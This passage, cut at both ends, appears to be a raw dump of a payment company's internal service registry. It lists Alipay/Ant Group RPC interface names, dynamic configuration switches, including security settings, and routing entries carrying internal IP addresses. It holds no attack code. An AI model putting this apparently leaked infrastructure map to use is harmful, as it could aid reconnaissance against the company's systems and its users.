SOFA","DATA_ID_11.124.182.108#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cashier.service.api.PayChannelConsultService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@workflow#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.fpdecision.platform.common.service.facade.iface.UserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.batchpayprod.service.facade.loan.RepaymentResultCallbackService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.charge:name=com.alipay.cif.client.drm.PerformanceSwitcher.checkPointLogEnabled,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.zmxy.creditacceptance.common.service.facade.OrderNotifyRZoneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkprodmng_dcsRuleAgreeCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.166.255.97#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.cashier:name=com.alipay.cashier.common.service.integration.drm.resource.AntEventContextResource.transforCfg,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfocore.core.service.fop.processor.TaskProcessorManager:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.26.68#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.spcenter.facade.isvoperation.IsvOperationAuthorityFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acassistant.common.service.facade.AnalyzerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:secucns@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antfeaturelib.common.facade.service.DataViewCalcService:1.0:edge_antfeaturemeta@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitestcenter.common.service.facade.api.RulecenterFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.argo.spi.publish.CustomDeployFacade:1.0:ARGO_PYXIS_CFG@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openmonitor.common.service.facade.IsSignServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.cif.client.drm.StaticResourceReportConfigSwitch.interval,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kabaoprod.service.facade.api.VerifyRecordOpFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.discount.common.service.facade.DiscountConsultiveService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.diagnosis.service.TaskMgmtService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.SeaViewRoomFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.emcooperate.common.service.facade.BizModelDataQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.antvip.client.internal.drm.DrmSyncControl.responseExceptionIntervalSeconds,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.csguide.service.facade.api.PageTemplateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.reading.common.service.facade.live.api.LiveUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkdepmng_closeLpaOverDraftProcessCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.177.40#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.insttrade:name=com.alipay.insttrade.core.service.drm.AcsAccountDRM.payerCardNos,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.yingxutestGZTBaseCache.refresh,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","SOFA_PRC_TRANSMIT_MEMBERPROD#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilelbs.common.service.facade.smartgis.SmartgisQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.yeb.YebDefaultConfirmAndProfitDateQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.csplatform.service.facade.api.QuestionRecordService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.4.94#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_11.160.177.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promocenter.facade.api.prototype.ActivityAuditService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.linglongsdk.server.facade.SceneOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcardcenter.common.service.facade.McardFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.gold.PigRunningBaseManageService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scenecore.facade.zdata.ZdataOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mnotify.biz.client.client.rpc.MNotifyPluginRPCService:1.0:scardcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.chaos.dig.facade.code.api.CodeAttackApiFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.finrtcenter.common.service.facade.evaluation.EvaluationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cif.facade.UserInfoManageQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.antvip.client.internal.drm.DrmControl.waitServerListTimeoutMs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditdmp.facade.PcdmpInstEvaluateManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","cn.com.antcloud.acticketcore.kernel.common.service.facade.HttpClientFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.csplatform.service.facade.api.RecommendQuestionService:1.0:outer@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudbox:name=com.alipay.common.security.dresource.SecurityCommonDrm.allowHostUrlList,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.PaymentNoticeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insusercenter.facade.offline.api.OfflinePolicyFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:finorm@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_S_REVCORE_*#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.lifecore.common.service.facade.view.ComponentOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:hpmweb@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.operation.common.service.facade.api.OperationActivityConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finfundcore-splitTask#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fininfo.common.service.facade.info.InfoCallService:1.0:exchangecore@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.appstore.common.service.facade.promotion.PromotionTaskQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.vtask.TaskSignUpAuditFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppBaselineConfigUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finormweb.service.facade.AppRiskInspectServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ofpgrowth.common.service.facade.spi.HomePageOfflinePaymentConsultService:1.0:homepage_camp@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.common.service.facade.budget.api.BudgetManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zcache:name=com.alipay.zcache.tbase.workflowxTBaseCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.82.87.135#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.${fluxconf_app_name}:name=com.alipay.fc.fluxconf.fluxconfClient.drm.CtrlDataResource.domains,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.custdecision.service.facade.UserQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.plugin:name=com.alipay.routeclient.DefaultRouteCoordinator.zoneInfo,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.cstrategycenter.common.service.facade.ComplianceConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchantsettle.common.service.facade.api.VerificationBillService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finvirtualta.core.service.yeb.repository.YebSystemParamRepository:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.64.18#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openitemcore.common.service.facade.api.tool.AppToTempAppAuthRetryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fininfo.common.service.facade.info.InfoSystemInvokeService:1.0:overseaprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.recruitcore.facade.api.enroll.EnrollReverseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeapcore:name=com.alipay.tradeapcore.common.service.integration.drm.resource.DrmForCommonManageResource.transmitCNR2Mstl,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.bbcmng.immunemng.facade.ImmAllSolutionFacade:1.0:zmcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agap.service.facade.mng.api.WordEntryMngService:1.0:tcService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.project.common.facade.api.ProjectMemberApi:1.0:dpproject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.withdraw.api.ApplySyncDishonoredContractBacsService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insiop.common.service.facade.module.InsIopBizTypeMngFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-finriskportal-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.aliminiabilityprod.facade.api.BundleJsApiQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.agds.common.service.facade.creditobtain.client.CreditObtainMonitorFacadeClient:1.0:creditObtainMonitorFacadeClientTrService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","antprocess@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.mobilepep.spi.service.MobilePEPService:1.0:csactive@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.charityprod.commom.service.facade.CharityProjectQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:pcreditsentry@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.manager.PermissionCompensateManager:1.0:antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.fc.ptcore.common.service.facade.api.product.ProductRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.prodtrans.senior.record.facade.ProdtransXTSLocalRecordFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prodtrans.senior.manage.facade.SubProductManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:rceducenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfiprod.common.service.facade.p2p.asset.service.ReservationAssetDetailQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstoreapp.common.service.facade.shoprelation.query.MerchantShopRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.finfocore.common.service.integration.drm.DrmCdsManager.fatigueFilterOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreTairCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.19.28.154#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.promomng.common.service.facade.CampPageInfoQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.scardcenter.common.service.facade.CardModelServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchstm.common.service.facade.mart.facade.AssetMartDataFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@meshyopt#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","com.alipay.openhome.facade.ding.DingGroupChatServiceFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fundprod.common.service.facade.product.query.PrivateFundInventoryQuery:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.confreg.api.ResAuthQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.132.31#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.autoinsprod.common.encrypt.AutoEncryptFacadeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.biz.shared.feature.template.DetectItem:1.0:clockResConsumptionDetectItem@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.qconsole.facade.mq.MQSubRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.securityops.common.service.client.spi.SecOpsChangeCallbackService:1.0:ifcriskcloudus@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.0.149#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.arcore.common.service.sdk.facade.ArViewBuildFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.assettrans.facade.sfa.api.SfatransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dataphin.pipeline.common.facade.core.plugins.PipelinePluginOpenService:1.0:dataphin-pipeline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custinsight.common.service.facade.userdata.biz.service.RewardAmtExposeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.132.99#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.assetflux.service.assettool.spi.AssetToolFreezeService:1.0:debittrans-freeze@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bstsolprod.npp.facade.operate.PositionOperateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.transit.service.TransitInstKeyService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfsettle.facade.api.AdvanceRcptOperationFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmember.common.service.facade.forest.CharityAccountQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.core.shared.drm.PortfolioCoreSharedDrm.underlyIndexs,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_100.69.243.27#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.iclientgw.adapterservice.web.MobileRPCAdapterFacade:1.0:imobileprod@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.amspm.ardd.common.support.api.BizIdentityDataServiceFacade:1.0:payrms@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_11.158.46.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.transferprod.common.service.facade.api.TimingTransferFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.core.shared.drm.FlowConfigDrm.batchPlanGrayUserFlow,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.event.api.input.EventReceiverService:1.0:SL__TP_F_SC_SERVERLESS_TASK_STREAM_YI_XIA_TEST@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifeprod.common.service.facade.api.lifeapp.LifeInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.revtransTairCache.elastic,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.vouchercore.facade.api.order.VccTradeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.service.DailyCutCheckService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.userview.facade.UserviewCompensateService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.openinsight.common.service.facade.rec.api.RecSolutionServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.bizfundprod.common.service.facade.account.TrusteeshipAccountFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.lendpofprod:name=com.alipay.common.tracer.manage.TracerDrm.zdalDbDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.alm.service.facade.facade.FinanceManagerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:gfmdm_antProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.insmobile:name=com.alipay.common.tracer.manage.TracerDrm.enableRpc2JvmDigest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.gmcore:name=com.alipay.cif.model.cache.CifCOControlSwitch.writeCustProp,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.dpc.common.security.SecurityService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.findatacanal.common.service.manage.gildata.ViolBulletinFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.quickrun.common.service.api.DataRunFacade:1.0:frscenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifecore.common.service.facade.lifeapp.LifeAppQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.socialcore.facade.workbench.WorkBenchMenuFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.dweg:name=com.alipay.common.security.util.dresource.SecurityCommonUtilDrm.paramCheckDeny,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.core.starwish.drm.CoreDrm.countUserNumBySceneTypeReadSlave,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.instopen.service.facade.taskcenter.TaskCenterService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mutest.bumng.BumngService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.paycore.service.payment.asset.AssetPrepareService:1.0:dcepAssetFluxService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.mif.common.service.facade.category.BizCategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.fcbuservice.common.service.facade.RoleActionFacade:1.0:zmbuservice-roleactioncompatiblefacade-managerole-antzhixin@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kborderprod.common.service.facade.api.order.OrderConsultFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.benefitcore.common.severless.facade.spi.paychecker.SpiBenefitSendOrderQueryFacade:1.0:fundapplication@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_C_OPEN_DEVELOPER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.pmc.common.service.facade.callback.CallBackApplication:1.0.0:prodmng-linepayTwoStepAuditPMCCallbackService@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.icif.service.facade.api.PermissionQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:pcreditauthprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finpwm:name=com.alipay.finpwm.biz.cpm.drm.CpmSasControlDrmResource.querySaveMoneyAndCountByIntegration,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.transfercenter.common.service.facade.api.TransferConsultRZoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pointcore.common.service.facade.DepositService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.217.13#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.landlordgame.facade.api.QueryBuildingFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.platform.schedule.concurrent.load.Loader:1.0:exchangeLoader$1@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finopenscene.facade.live.LiveInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.159.26#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.sofa.rpc.elastic.ElasticService:1.0:voucherprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.140#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","cn.com.antcloud.acauthcore.common.service.facade.manager.GroupManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA-SCHEDULER-S-S-midas-scheduler#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.amsAssistantTBaseCache.czoneSwitchMap,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.riskmodelpredict.common.service.facade.model.SceneModelRpcService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fintranscore.p2p.service.facade.trans.P2pPurchaseFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.39.139.8#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pucprod.common.service.facade.sync.SyncOweInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zpaas:name=com.alipay.common.tracer.manage.TracerDrm.zdalTairDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.decisionx.facade.DecisionService:1.0:finannafccore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.security.dresource.SecurityCommonDrm.totalUrlDecodeTimes,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.opencore.service.facade.msecuritypay.SecurityPayAppService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.progov.service.antplatform.api.DemandFlowManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alibaba.dataphin.schedule.operation.sdk.com.facade.api.InstanceListQueryApi:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.appstore.common.service.facade.commodity.CommodityOrderQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mfinpromo.common.service.facade.divide.DivideListFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.30.196.216#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.airbops:name=com.alipay.common.webx.session.drm.SessionLogDrm.formtokenSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.mosn.MosnAppInvokeService:1.0:finscprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbomp.dynamic.service.DynamicQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ap.gloantrade.common.service.facade.api.contract.ContractQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:ifpdop@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.kwlib:name=com.alipay.cif.drm.PasswordRevokeSwitch.simplePasswordRevoked,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.securitycap:name=com.alipay.antvip.client.internal.drm.DrmControl.mainSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mobilepep.common.manage.facade.CardCopyManage:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.open.facade.reply.OpenReplyUpdateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.addpInsttradeTairRz.foReadPolicy,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.custview.facade.antg.AntAccessTokenViewQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.insmarketingprod.common.service.facade.taskapp.MktTaskappFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:zmcreditmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airprod.common.service.facade.aircard.issuer.PrepaidIssuerService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloudnet.facade.network.DnsServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.finfocore:name=com.alipay.routeclient.DefaultRouteCoordinator.grayKey,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.excashier.unipayment.common.service.payment.UniPaymentExecuteService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.acbsbcore.common.service.facade.BsbCallerFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:sofabootdemo@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.156.48#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.antassistant.common.service.facade.api.omo.